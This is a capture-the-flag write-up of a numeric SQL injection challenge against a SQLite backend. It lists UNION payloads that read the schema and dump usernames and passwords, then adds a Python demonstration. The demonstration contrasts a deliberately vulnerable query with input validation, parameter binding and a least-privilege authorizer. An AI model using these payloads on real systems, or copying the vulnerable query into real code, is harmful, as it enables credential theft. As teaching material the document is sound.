SQL injection: numeric
root-me challenge: SQL-injection-Numeric: Retrieve the administrator password.
news_id=1' UNION SELECT NULL --
SQLite3::query()
Using PayloadsAllTheThings: SQLiteInjection:
news_id=1 UNION SELECT NULL,sql,NULL FROM sqlite_master --
news_id=1 UNION SELECT NULL,username,password FROM users --
Techniques
Counter moves
The variant in play here is numeric SQL injection. The counter moves reduce to server-side validation and least privilege. From the defender's side, this is covered in the blue notes on the application layer as a target.
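The two counter moves, as an added example that is not part of the original notes or the challenge's code: Python's sqlite3 module stands in for the SQLite backend, and the table layout, sample rows and function names are assumptions constructed for the demonstration.

```python
import re
import sqlite3

PAYLOAD = "1 UNION SELECT NULL,username,password FROM users --"  # from the notes above

def make_db():
    """Constructed in-memory stand-in: three-column news table plus users."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO news VALUES (1, 'Hello', 'First post');
        INSERT INTO users VALUES ('admin', 'constructed-secret');
    """)
    return db

def get_news_vulnerable(db, news_id):
    # Numeric context: the value is unquoted, so nothing has to be escaped
    # to append a UNION. Shown only as the "before" of the fix.
    return db.execute("SELECT id, title, body FROM news WHERE id = " + news_id).fetchall()

def get_news_hardened(db, news_id):
    # Server-side validation: ASCII digits only, bounded length.
    if not re.fullmatch(r"[0-9]{1,9}", news_id):
        raise ValueError("news_id must be a non-negative integer")
    # Bound parameter: the value never becomes part of the SQL text.
    return db.execute("SELECT id, title, body FROM news WHERE id = ?", (int(news_id),)).fetchall()

def restrict_to_news(db):
    """Least privilege: this connection may only SELECT from the news table."""
    def authorizer(action, arg1, arg2, dbname, source):
        if action == sqlite3.SQLITE_SELECT:
            return sqlite3.SQLITE_OK
        if action == sqlite3.SQLITE_READ and arg1 == "news":
            return sqlite3.SQLITE_OK
        return sqlite3.SQLITE_DENY  # users, sqlite_master, writes, PRAGMA, ATTACH
    db.set_authorizer(authorizer)
    return db

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", get_news_vulnerable(db, PAYLOAD))
    print("hardened:  ", get_news_hardened(db, "1"))
    try:
        get_news_vulnerable(restrict_to_news(db), PAYLOAD)
    except sqlite3.DatabaseError as exc:
        print("restricted connection:", exc)
```

On a server database the equivalent of the authorizer is a dedicated account granted SELECT on the news table only.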